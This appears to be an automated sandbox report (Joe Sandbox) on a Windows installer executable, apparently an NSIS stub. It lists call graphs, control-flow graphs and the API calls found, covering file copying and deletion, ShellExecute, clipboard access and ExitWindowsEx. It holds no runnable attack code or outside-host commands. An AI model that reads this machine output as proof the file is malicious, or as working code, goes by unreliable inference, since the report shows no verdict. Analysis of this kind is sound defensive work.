3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                      • GetClientRect.USER32(?,?), ref: 00405196
                                                      • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                      • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                        • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                      • ShowWindow.USER32(00000000), ref: 004052E7
                                                      • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                      • ShowWindow.USER32(00000008), ref: 00405333
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                      • CreatePopupMenu.USER32 ref: 00405376
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                      • GetWindowRect.USER32(?,?), ref: 0040539E
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                      • OpenClipboard.USER32(00000000), ref: 0040540B
                                                      • EmptyClipboard.USER32 ref: 00405411
                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                      • CloseClipboard.USER32 ref: 0040546E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                      • String ID: @rD$New install of "%s" to "%s"${
                                                      • API String ID: 2110491804-2409696222
                                                      • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                      • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                      APIs
                                                      • #17.COMCTL32 ref: 004038A2
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                      • OleInitialize.OLE32(00000000), ref: 004038B4
